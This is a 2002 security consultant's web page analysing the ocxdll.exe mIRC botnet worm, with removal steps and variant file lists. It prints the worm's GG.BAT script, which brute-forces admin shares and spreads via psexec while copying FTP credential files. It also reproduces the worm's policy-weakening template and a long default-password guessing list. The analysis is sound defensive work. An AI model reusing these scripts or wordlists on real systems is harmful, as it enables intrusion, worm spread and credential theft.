KLC Consulting, Inc.
Information Security Services
info@klcconsulting.net 

mIRC (port 445) Trojan Analysis

Tel: 617-921-5410

Translate

Home

About KLC

Services

SMAC

Trojan Analysis Security Resources Spoof MAC Address

SMAC 2.0 SMAC 2.0 is released.  It has included many NEW and ENHANCED features.
SMAC-CL: SMAC Command Line Edition.  Scriptable Console based MAC Addresses Spoofer

 

Virus/Worm/Trojan
Resources

Virus List

Trojans Library

Trojan Ports

Symantec AV

Virus Alert


mIRC Virus / Worm / Trojan Analysis (ocxdll.exe, Taskmngr.exe, mdm.exe, "HideWindows Error")

URL of this article is: http://www.klcconsulting.net/mirc_virus_analysis.htm

KLC Consulting Security Team believes that this is a prototype, and the start of the malicious IRC  BotNet Distributed Denial of Services (DDoS) revolution from the bad guys.  This article will give you the fundamental understanding of how IRC type of BotNet DDoS Trojans spread themselves so quickly ...

------------------------------------------
Author:
------------------------------------------

Kyle Lai, CISSP, CISA

KLC Consulting, Inc.

klai@klcconsulting.net 

www.klcconsulting.net 

------------------------------------------
Content
------------------------------------------
- ocxdll.exe / mIRC Trojan Analysis Part 1
- ocxdll.exe / mIRC Trojan Analysis Part 2
- Trojan Removal and Protection tools
- Summary
- Trojan Files List
- An analysis on another IRC worm/Trojan (Deloder), more malicious than ocxdll.exe
------------------------------------------

------------------------------------------
ocxdll.exe / mIRC Trojan Analysis posted on Google Discussion Group, Part 1:

------------------------------------------

More Analysis on ocxdll.exe virus: v. 1.1

Kyle Lai, CISSP, CISA
klai@klcconsulting.net


+++++++++++++++++++++
This is a SMB over TCP attack, using port 445. It looked for vulnerability in weak administrator id and passwords on the local Windows 2000 systems.
+++++++++++++++++++++

One of my clients also got infected with ocxdll.exe virus. After some detailed analysis, I have determined that it was a Trojan, deleted the detected registry entries, deleted the infected files, tightened the local administrator ID and password, restored the security policy by running "secedit.exe /configure" (from Microsoft) to restore the security policy (If they have a backup .sdb file, then just reapply the security policy would fix this part), added users /groups back to "Access this computer from the network" policy . The cause was due to bad security (admin ID and passwords), and firewall, and possibly a backdoor.

Effected systems:
- Windows 2000, XP (same port, 445, but not tested yet). Security policies alteration was ONLY for Windows 2000 (and maybe on XP) 
- Windows NT - might be infected as the "root problem" to spread the trojan, but it will not get this Trojan base on its re-distribution method. You probably want to look into this system to determine if there are any backdoors, Trojans, or if this system wascompromised in any way. It will not change security policies.

What did it do?
++++++++++++
1. hide all programs it ran.
2. Run mIRC client with random usernames listed in mdm.scr with more random characters
3. open backdoor, port 60609
4. It ran the bot (robot) scripts in the following order, which means they contained malicious automated instructions.
[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini.

5. Replace security policy settings using Microsoft security editor (SecEdit.exe/configure) command and reset the security policy to default settings, and replace some additional security settings using the TFT8675 file. This is done in quiet mode so itprobably only flashed the command line window very quickly.

6. It scans for 25 IP's and then start running "GG.BAT". GG.BAT is the REAL program that started the hacking.

7. It tries to hack into the system using the following user ID and password. If you don't have these user id and passwords, maybe you are just infected with 1 system, and it could not spread via this Trojan/worm.

a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password

8. If you have some guessable administrator id and passwords, then probably these systems were hacked successfully. It copied the Trojan OCXDLL.EXE to the compromised systems. If file were there, copy it anyway, and do it quietly. (using psexec.exe -c -f -d)

9. Run the OCXDLL.EXE without any delay (psexec.exe -d), which extracted the 17 files that are in this self-extracted file.

10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and "c:\progra~1\ws_ftp\ws_ftp.ini" to "c:\windows\system32" directory.
(maybe get the configuration from the bot?)

11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc client.

12. The scripts were kicked in to HIDE the mirc window, so you can ONLY see it in the process. You will see "taskmngr.exe" (NOT taskmgr.exe, which is the REAL task manager)

13. xvpll.hlp reports Trojan status back to the hacker. Either attempt failed or attempt successful.
++++++++++++
Disclaimer: The irc bot scripts have not fully analyzed. This is what I understood so far. The removal instructions WILL remove the trojan.
++++++++++++

 

Impact:
+++++++++++++
This may be a random attack. However, there is a file, ncp.exe involved, which is the NetCat program. This program allows the hackers to gain full control to your system.
Therefore,
1. Best-case scenario is that it was a random attack by the Trojans, and no sensitive data were lost.  Your systems may be used as a zombie for Distributed Denial of Service attacks.

2. Worst-case scenario is that they have controlled your system and implemented something new that are not yet detected.

3. The hacker has captured your IP address and knows that you were vulnerable because the Trojan actually reported back to him/her.  They have the account they successfully compromised, and they *could* possibly got a copy of users and passwords on that system, and *maybe* the credit card info if you shop online.
+++++++++++++

How to remove the Trojan:
++++++++++++++++++++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe and dll16.ini

(created when running mirc.exe)

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

++++++++++++****NOTE:
seced.bat is a decoy. This file was never used. The real instruction for updating the configuration was mentioned in item #5. v.exe is actually srvany.exe, which is another decoy. It was never used.
++++++++++++

2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe" (this starts mirc client program during the
windows startup)
3. Change the LOCAL Administrator password on ALL Systems! This
includes Windows 2000 PROESSIONAL! Make sure the new passwords are
strong passwords! Use mix of Uppercase, Lowercase, numbers, and
non-alphanumeric, i.e. _,+,=,), ? for your newpasswords, and make sure
the passwords are NOT similar to the administrator ID in any way. For
example, "Administrator123" is a very bad password, even it has mix
cases and alphanumeric.

4. If possible, change Administrator login ID to a different user_id. This will stop the initial user_id guessing. (This will not stop the more sophisticated hackers)

5. Restore the default security policy by restoring the basic Microsoft default security template. The following instruction for restoring basic default security template is from the USENET posting by Edward Alfert (edward@alfert.com) under topic "Solution to mIRC and Secedit Virus Networking Problems." in microsoft.public.scripting.virus.discussion.. More info on Microsoft Security configuration and analysis can be found at
http://www.microsoft.com/windows2000/en/advanced/help/default.asp?url=/windows2000/en/advanced/help/SCE_newconfig.htm

Here are the instructions from Edward Alfert.
================

1) use the backup security database template to restore the system to its original microsoft defaults. (NOTE...if you upgrade from a previous OS, this default may not be the default you are used to)...

cd %windir%\security\templates

Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log /verbose

2) copy /winnt/security/database/secedit.sdb to /winnt/security/database/secedit-check.sdb

you need to do this because you can't run step #3 against the original secedit.sdb

3) click on start, run, type mmc and click ok

4) click Console menu, then Add/Remove Snap-In

5) click Add, then double click on "Security and Configuration Analysis" and "Security Templates", then click close, and ok.

6) right click on "security and configuration analysis" and click on "open database"... browse to /winnt/security/database/secedit-check.sdb and select it.

7) right click on "security and configuration analysis" and seclect "analyzie computer now"

8) browse throught the directory structure and you will see that the computer is currently configured differently..

Make changes as appropriate for your environment.

For example, a very important option that is probably missing (as caused by the trojan) is that nobody is allowed to logon to the computer via the network).
================

6. Goto start -> programs -> administrative tools -> Local SecurityPolicy, click on

"User Rights Assignments", and add users and groups back into the policy. "Access this

computer from the network". The default setting is:

a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[ SYSTEM_NAME]

7. You MUST go through the security policies and make sure proper access were restored. You or some of your applications might have specific rights settings prior to the compromise, and the user/group privilage/rights need to be reset if necessary.

8. You probably have seen a strange SID that was added by the trojan in the "Logon Locally" policy. Remove the user SID. The SID there does NOT mean the trojan created a user. It was in the security template on TFTP8675 file. You can see it on the bottom of this document.

Additional Recommendation
1. Tighten your Firewall and lock down the ports and ACL, BOTH inside to outside, and outside to inside. Make sure port TCP/UDP 445 is blocked both inbound and outbound on the firewall.

2. If possible, Rename your administrator user id to something else, and create a user id called "Administrator" with NO GROUPS associated with it. This will allow you to monitor anyone from trying to use the "Administrator" login.

3. Setup the security event log. Log successful and failed Logon/Logoff to audit system access. Make sure to monitor the event logs.
++++++++++++++++++++

More details:
Infection:
registry entries
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe"

(this starts mirc client program during the windows startup) When MIRC client started running, it ran the scripts in dll32nt.hlp,which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+tftp8675 /quiet". This meant

"configure your system setting with the existing security policy in secedit.sdb, plus the additional settings in tftp8675". It basically removed many security restrictions, remove all audits for the systems, and of course remove all users in the "Local Users allowed from the net".

OCXDLL.EXE is a self-extracted file that included 17 files. It is a Trojan/worm. In the dll32nt.hlp, it has an instruction to do IP scan, and store the 25 IP address it found. Mostly likely it scanned the subnet and file servers that were connected to the compromised system at that time. Then the Trojan has an instruction at the end to run

GG.BAT, which is the instruction to attack the 25 IP's it just found. Then the process started all over again.

Here are the files that were extracted from ocxdll.exe:
+++++++++++++++++++++++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++++++++++++++++++++++++

Here is the GG.BAT text:
------------------------
@echo off
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat
c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini
c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
------------------------

-------------------------------------
from SysInternals, here is the description of what the PSEXEC parameters do:
-c = Copy the specified program to the remote system for execution. If you omit this option then the application must be in the system's path on the remote system.
-f = Copy the specified program to the remote system even if the file already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for non-interactive applications.
---------------------------------------

List from TFTP8675:
----------------------
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
[Registry Values]
machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1
machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1
machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0
machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0
machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0
machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0
machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1
machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1
machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15
machine\system\currentcontrolset\control\session
manager\protectionmode=4,1
machine\system\currentcontrolset\control\session manager\memory
management\clearpagefileatshutdown=4,0
machine\system\currentcontrolset\control\print\providers\lanman print
services\servers\addprinterdrivers=4,0
machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0
machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0
machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0
machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0
machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1
machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1,
machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1,
machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0
machine\software\microsoft\windows
nt\currentversion\winlogon\scremoveoption=1,0
machine\software\microsoft\windows
nt\currentversion\winlogon\passwordexpirywarning=4,14
machine\software\microsoft\windows
nt\currentversion\winlogon\cachedlogonscount=1,10
machine\software\microsoft\windows
nt\currentversion\winlogon\allocatefloppies=1,0
machine\software\microsoft\windows
nt\currentversion\winlogon\allocatedasd=1,0
machine\software\microsoft\windows
nt\currentversion\winlogon\allocatecdroms=1,0
machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\setcommand=4,0
machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\securitylevel=4,0
[Privilege Rights]
seassignprimarytokenprivilege =
seauditprivilege =
sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551
sebatchlogonright =
sechangenotifyprivilege =

*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0
secreatepagefileprivilege = *S-1-5-32-544
secreatepermanentprivilege =
secreatetokenprivilege =
sedebugprivilege = *S-1-5-32-544
sedenybatchlogonright =
sedenyinteractivelogonright =
sedenynetworklogonright =
sedenyservicelogonright =
seenabledelegationprivilege =
seincreasebasepriorityprivilege = *S-1-5-32-544
seincreasequotaprivilege = *S-1-5-32-544
seinteractivelogonright =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501
seloaddriverprivilege = *S-1-5-32-544
selockmemoryprivilege =
semachineaccountprivilege =
senetworklogonright = Microsoft
seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547
seremoteshutdownprivilege = *S-1-5-32-544
serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551
sesecurityprivilege = *S-1-5-32-544
seservicelogonright =
seshutdownprivilege =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545
sesyncagentprivilege =
sesystemenvironmentprivilege = *S-1-5-32-544
sesystemprofileprivilege = *S-1-5-32-544
sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547
setakeownershipprivilege = *S-1-5-32-544
setcbprivilege =
--------------------------


--------------------------------------------------------------------------------



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ocxdll.exe / mIRC Trojan Analysis posted on Google Discussion Group, Part 2:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


More Analysis on IRC Virus/Trojan Part 2: By
++++++++++++++++++++
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
klai@klcconsulting.net
++++++++++++++++++++
++++++++++++++++++++++++++
Disclaimer:
First of all, I want to say that I have nothing against Microsoft. I
am just presenting my analysis.
This analysis is based on my examination of the IRC Trojan/virus as
referenced in Microsoft Knowledge Base Article - Q328691; however, I
am not to be held responsible for the information provided. Also, I
have not researched any of the previous IRC/flood Trojan/viruses;
therefore, I am not knowledgeable in all aspects of that topic. If
you think the information, in this posting, is not accurate, please
send me an email.
+++++++++++++++++++++++++++

This IRC Trojan/virus is vaguely similar to the earlier IRC/flood Trojan/virus. However, this time it takes advantage of weak computer systems security and performs a denial of service (DoS) attack. The vulnerability is typically caused by the lack of corporate security awareness.

Just some comments to Microsoft's response:

1. It uses port 445, which is SMB over TCP for attack. It doesn't use port 139, so NT4 is not vulnerable to this particular Trojan. However, port 139 is another typical hackers' target. Make sure your firewall is locked down. If you don't have a firewall, get one!

2. OCXDLL.EXE is a self-extracting executable containing 17 files. To totally remove the Trojan, you can read my original analysis where I listed all the files that are "directly" involved
(http://groups.google.com/groups?q=solution+irc+virus&hl=zh-TW&lr=&ie=UTF-8&oe=UTF-8&selm=bf0f8e77.0209050049.24860609%40posting.google.com&rnum=4).
Again, I can't tell if any files were added/deleted by the hackers for all of you out there. Reason: Once the hacker(s) compromised your machine(s), they own your entire system(s).

3. ncp.exe was included in ocxdll.exe. ncp.exe is actually the NetCat program, which is one of hacker's favorite tools. Microsoft did not identify this tool.

4. mt.exe was another program that requires cygwin.dll. If you use Linux emulator via Cygwin, then this file would exist on your system.
In discussion with Symantec, one analyst said "mt.exe is just a rather old Unix bot named knight.c that has been recompiled to use cygwin and run on Windows. This is basically a DdoS bot." However, I cannot confirm this because I have never dealt with it before. In the scripts, I did not see any evidence of mt.exe being called, however, I wouldn't rule out if the hacker executed this program remotely.

5. Microsoft said in the article Q328691 "NOTE: Paths to the files are not listed because they may vary." This statement is correct, however, probably 99% (just a guess) of the people setup with the default Windows 2000 configuration, which will leave you at "\WINNT\SYSTEM32", or. I suspect that ocxdll.exe were copied to the folder where "services.exe" is located because when I tried to run the psexec.exe similar to the ones in the script, it started the process "services.exe" on the remote system, followed by "psexesvc.exe", then followed by "services.exe". Guys, I didn't have time to try it out and if you can, keep me updated with your test results. I can't find psexesvc.exe on my system though? PSEXEC.EXE can be downloaded from Sysinternals. (http://www.sysinternals.com/ntw2k/freeware/psexec.shtml)

Test procedure:
a. Download psexec.exe and save it at c:\test\.
b. Create a file called c:\test\test.bat with the following 2 lines Echo done testing > test-1.txt

c. Type ( Net Use \\[computer_ip]\IPC$ "[password]" /user:[administrator id]) to connect to the remote computer as a system admin.
d. Type in "psexec \\[remote-system] -f -c -d test.bat -o" (to examine where the files are copied to.)
e. Goto remote system, "cd %systemroot%\system32", search for test*.* and you should find:
i. Test.bat
ii. Test-1.txt
f. Open test-1.txt, and you will see the following line in the file, which proves that "test.bat" has been executed: "done testing"

g. This showed basically how psexec.exe work, and how dangerous it could be used when it's on the hacker's hand? psexec.exe copied the test.bat file over to the remote system, and then executed right after it was copied.

6. It tried to create a filelist of each filetype with the following format .MPG, .AVI, .ASF, .RAR, .ZIP, .CUE. These instructions are in httpsearch.ini. Since the machines I examined have this file extracted from ocxdll.exe in 8.3 format ( "httpsear.ini"), I don't believe this script was executed. Therefore, I did not see files such
as:
a. listmpg.txt
b. listavi.txt
c. listasf.txt
d. listrar.txt
e. listzip.txt
f. listcue.txt
g. warezlist.txt
h. medialist.txt

You probably want to check these files anyway though?

7. On my previous analysis, there is the content of TFTP8675, which was the actual security template that was applied to the security settings. This template actually changed user permissions/rights policies. There are 3 major discoveries:
a. If you compare the Basic Microsoft default templates that ship with Windows 2000, this hacker used the exact basic Microsoft template, but added the [Permission Rights] section of the security template.

b. It trys to assign guest the right to "logon locally". The entry was (seinteractivelogonright =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501).
*S-1-5-21-1960408961-1637723038-1801674531-501 is the guest user SID it tried to add to the system ("501" at the last section of the SID indicates the Guest account). On the systems I examined, the SID value did not change when it was spreading, which meant guest accounts were not added successfully.

c. The part where it replaced the "Access this computer from the network" policy is (senetworklogonright = Microsoft). I noticed that the designer of this Trojan/virus/malware used SID to assign user rights besides this one? I think he/she is trying to make a point (?)


I don't think there can be a conclusion on what's lost if the systems were compromised. However, we can be sure that port 445 is open on many Windows 2000 and XP systems out there, which are not protected, and a lot of people out there are not security conscious on their Windows 2000 and XP systems, which require a little bit more technical skills to lock down the systems.

I highly recommend that system administrators follow the Microsoft security guidelines on hardening their Windows-based environment.

I also, would suggest that everyone infected by a Trojan/virus run some anti-Trojan programs in addition to the Anti-Virus software. Anti-Trojan programs like Anti-Trojan (http://www.anti-Trojan.net), Pest Patrol (http://www.pestpatrol.com), and others to ensure there are NO Trojan/hacker tools on your systems, which are sometimes missed by Anti-virus programs.

Besides anti-Trojan software, you probably should to run something like Ad-Aware (http://www.lavasoftusa.com/) to remove the adware that were downloaded unintentionally when you are surfing the web?

I hope "Internet Security" is not oxymoron.

Trojan Removal and Protection:

Here are some free software utilities that can help you fight the Trojan and intrusions. If you use these utilities, make sure you get the latest updates regularly:

1. Make sure you have the latest Anti-Virus definitions that downloaded from your anti-virus software vendor. If you don't have one, here is a free one: http://www.grisoft.com 

2. Make sure you get an Anti-Trojan software on top of the Anti-Virus software. Many Anti-Virus software does not detect Trojans and Hacker software that was installed during an intrusions. Anti-Virus software does not detect hacker software because it could be used ligitimately by security professionals... A free and Great one is Swat-IT by Lockdown Corp: http://lockdowncorp.com/bots/downloadswatit.html 

3. Get Ad-Aware software, which is for removing advertising software that web advertisers install on your systems without your acknowledgement while you are surfing on the Web... This is a free software too: http://www.lavasoftusa.com/software/adaware/ 

4. Get a Firewall for your computers if you have not get one. Here is a very simple to use firewall software: http://www.zonealarm.com 

 

Summary:

This particular mIRC Virus/Trojan has spread across the world around the end of August, 2002 (~8/27/2002).
Base on the information from the victims, a variant of the original OCXDLL.EXE had attacked again
around October, 23, 2002 and November 13, 2002..

I have heard there is a new variant is out there, and the new name for taskmngr.exe is now TASK32.EXE. (as of 11/13/2002).
This is reported by several victims in the newbie.org- taskmngr.exe discussion group I participated.

This virus took advantage of the Microsoft SMB over TCP (Port 445), which uses NetBios names.  
It attempted to spread to Windows 2000 Professional, Windows 2000 Servers and possibly Windows XP with 
weak and guessable administrator account and passwords:

Administrator account

Password

Administrator

[blank passwords]
admin
administrator
test
test123
temp
temp123
pass
password
changeme

(passwords used by DeLoder-A worm/Trojan)

0

000000

00000000

007

1

110

111

111111

11111111

12

121212

123

123123

1234

12345

123456

1234567

12345678

123456789

1234qwer

123abc

123asd

123qwe

2002

2003

2600

54321

654321

88888888

a

aaa

abc

abc123

abcd

Admin

admin

admin123

administrator

alpha

asdf

computer

database

enable

foobar

god

godblessyou

home

ihavenopass

Internet

Login

login

love

mypass

mypass123

mypc

mypc123

oracle

owner

pass

passwd

Password

password

pat

patrick

pc

pw

pw123

pwd

qwer

root

secret

server

sex

super

sybase

temp

temp123

test

test123

win

xp

xxx

yxcv

zxcv

Admin

admin

root

root

test

test

Microsoft got caught up with the original OCXDLL.EXE Virus/Trojan and issued a "Hacker Alert" 
on 8/30/2002.  The original Microsoft analysis was very vague and it got heavily criticized by the 
public.  Microsoft re-issued the analysis and titled "MIRC Trojan-Related Attack Detection and 
Repair"
on 9/6/2002 and removed the original article.  Below are some of the references regarding 
to this mIRC Virus/Trojan/Malware.

I am still helping out in the discussion group: newbie.org under "Taskmngr.exe".  There you can see the discussion and track the Trojan variants.

  1. Original Microsoft Knowledgebase Article Q328691 - Microsoft Hacker Alert posted 
    on Google Discussion Group (8/30/2002)

  2. Revised (current) Microsoft Knowledgebase Article Q328691 (9/6/2002) 

  3. Newbie.org website discussion - under the topic "taskmngr.exe" 

  4. Symantec Virus Analysis - trojan.ircbounce

  5. CNET - Microsoft "solves" hacking mystery

  6. Wired - Alert: Windows May Deny Users

  7. News Group - http://cert.uni-stuttgart.de/archive/isn/2002/09/msg00017.html

  8. OCXDLL.EXE files includes following files:
    --------------------------------------------
    ocxdll.exe - the worm/Trojan package file in self-extracted zip file format.  If executed, it unzip the following files into the Windows system32 directory.
    dll32.hlp - malicious mIRC script
    dll32NT.hlp - malicious mIRC script
    gates.txt - non-malicious scripts
    gg.bat - Batch file that is called first to compromise systems.  It has guessable user lists with passwords.  It targets \\[system]\IPC$ share.
    httpsearch.ini - malicious mIRC scripts
    kill.exe - not used, but is a program used to terminate processes.
    mdm.exe - HideWindow program.  It can hide a window otherwise will be seen.  This is used to hide the mIRC program window.
    mdm.scr - A list of nickname used by this worm/Trojan when joining into IRC.
    mt.exe - A rather old Unix bot named knight.c that has been recompiled to use Cygwin and run on Windows.
    ncp.exe - Net Cat program.  This is usually used to remote control a system.
    NT32.ini - malicious mIRC script
    psexec.exe - A program to start a process from a remote system.  psexec.exe is a legitimate program from System Internals.
    seced.bat - A decoy.  This file was never used.  The actual syntax in this file will re-apply the original security policies to the system.  However, it does not change the additional policies that were changed by the worm/Trojan beyond the original set of security policies.
    taskmngr.exe - The mIRC program
    tftp8675 - The security policies applied by the Trojan.  This caused Denial of Service as we discussed in the part 2 of the analysis.
    v.exe - A decoy.  This file was never used.  This is a SrvAny program from Microsoft resource kit.  It can make a program to run as a service.
    xvpll.hlp - Malicious mIRC script
    --------------------
    Files from variants
    --------------------
    BACKUP.BAT - Batch file that is called first to compromise systems.  It has guessable user lists with passwords.  It targets \\[system]\IPC$ share.
    NT32.INI - malicious mIRC script.
    PSTOR.EXE - This is a exploit program to steal username and passwords stored via pstorec.dll, which include some IE and Web Outlook. PStor.EXE is actually the program pStoreReader (exploit), and you can find the .exe and source code at http://intex.ath.cx.  I first saw this variant in 10/23/2002
    WINHP32.EXE - Hide window program
    DDSHARE.EXE - Denial of Service program, Syn Flooder.
    TASK32.EXE - mIRC version 5.7
    WinClock.exe - mIRC version 5.7
    hide.exe - Hide window program
    remote.ini - mIRC Scripts
    secureme - ? (not confirmed)
    win32.mrc - ? (not confirmed)
    start.bat - Batch file that is called first to compromise systems.  It has guessable user lists with passwords.  It targets \\[system]\IPC$ share.
    servudaemon.exe - ServU FTP Server, use to 
    ColdBot.exe - the worm/Trojan package file in self-extracted zip file format.  If executed, it unzip the following files into the Windows system32 directory.

    -----------------------------------------------------------------------
    Files in TROJ_FLOOD.BI.DR / IRC_ZCREW Trojan variant - source: Trend Micro
    -----------------------------------------------------------------------

    bootdrv.dll a non-malicious mIRC add-on utility that displays system information. 
    explore.dat a non-malicious text file. 
    explore.exe detected as TROJ_GLITCH.B. This file loads the component, explorer.exe, when executed. 
    explorer.exe detected as BKDR_IRCFLOOD.BI. This file is a modified mIRC application that acts as the server part of the whole backdoor package. 
    iiscache.dll detected as IRC_ZCREW.A. This is an IRC script that is used by the backdoor server. 
    libparse.exe a non-malicious utility that enables the user to display and terminate running processes. 
    navdb.dbx - a non-malicious text file that contains a list of words that is used by the modified mIRC application as IRC nicks. 
    psexec.exe - a non-malicious utility for Windows NT and 2000 systems that enable the user to execute processes on remote systems without having to install a client component. However, to be able to execute processes, logon credentials must be supplied. 
    rcfg.ini an IRC script file used by the backdoor 
    rconnect.exe a non-malicious utility that is a fully standards-compliant FTP server implementation. 
    rconnect.conf is a logon script for use with rconnect.exe. 
    SECURE.BAT detected as BAT_ZCREW.A. This batch file removes all default network shares, and stops system services such as Remote Access Connection Manager, telnet, messenger, and netbios. 
    server.txt a non-malicious log file. 
    str.vxd a non-malicious text file. 
    svchost32.exe a non-malicious utility used to hide the window of a program. 
    symbiox.dll an IRC script used by the backdoor. 
    v32driver.bat detected as BAT_ZCREW.A. This batch file attempts to logon to another machine on the local area network as Administrator using a list of passwords. If logon is successful, it copies and executes this Trojan itself on the compromised remote machine. 
    web.swf detected as IRC_ZCREW.A. This is an IRC script that is used by the backdoor. 
    www\MDX.DLL .DLL used by the backdoor. 
    www\moo.dll .DLL used by the backdoor. 
    www\VIEWS.MDX .DLL used by the backdoor. 
    www\webserv.mrc - an IRC script used by the backdoor. 
    www\htdocs\readme.htm a non-malicious text file. 
    www\htdocs\shik.gif - a non-malicious image file.

    -----------------------------------------------------------------------
    Files in Worm.Win32.Randon Trojan variant - source: viruslist.com
    -----------------------------------------------------------------------

    Deta.exe - HideWindows utility (WIn32 exe file)
    fControl.a - an IRC script (port scanning and infection remote computers)
    IfCOntrol.a - an IRC script (IRC-channels flooding and DDoS attacks (pinging different addresses) )
    incs.bat - BATCH file (lan resources password cracker)
    Libparse.exe is "PrcView" utility (Win32 EXE file)
    psexec.exe is "PsExec" utility (Win32 EXE file)
    rcfg.ini - IRC INI file (loading other scripts)
    rconnect.conf - configuration file
    reader.w - list of nicknames used by worm to establish connection with IRC-channels
    Sa.exe - TrojanDOwnloader.Win32.Apher
    scontrol.a - helper IRC script.
    sencs.bat - BAT file (this file is transfered to the remote computer to perform TrojanDownloader execution)
    systrey.exe - renamed mIRC client (Wind32 EXE file).

    ----------------------------------------------------
    Trojan Variants might include these Programs
    ----------------------------------------------------
    ServU FTP
    Raiden FTP
    FlashFXP
    Fire Daemon

 Part 1 and Part 2 of the original analysis on Google Discussion Group:

  1. ocxdll.exe / mIRC Trojan Analysis posted on Google Discussion Group, Part 1:

  2. ocxdll.exe / mIRC Trojan Analysis posted on Google Discussion Group, Part 2:

 

Additional resources on recovery:

Trojan Ports list:

CERT - Steps for Recovering from a UNIX or NT System Compromise

http://www.blackcode.com/trojans/ports.php 

Compromised Computer Identification and Fixing Guidelines by Allen Chang at UC Berkeley

http://www.sans.org/resources/idfaq/oddports.php 

http://www.govital.net/~soz/lists/Port_Lists.htm 

Additional resources on Trojan Horse:

http://www.iss.net/security_center/advice/Exploits/Ports/default.htm 

Complete Windows Trojans Paper

 

Distributed Denial of Service (DDoS) Attacks/tools

mIRC Trojan Variants:

TrendMicro TROJ_FLOOD.BI.DR / IRC_ZCREW Trojan Analysis

IETF Assigned Ports:

VirusList Worm.Win32.Randon worm/Trojan

http://www.iana.org/assignments/port-numbers 

 

  Site Meter  

 

Copyright 2002-2011 KLC Consulting, Inc..
All rights reserved.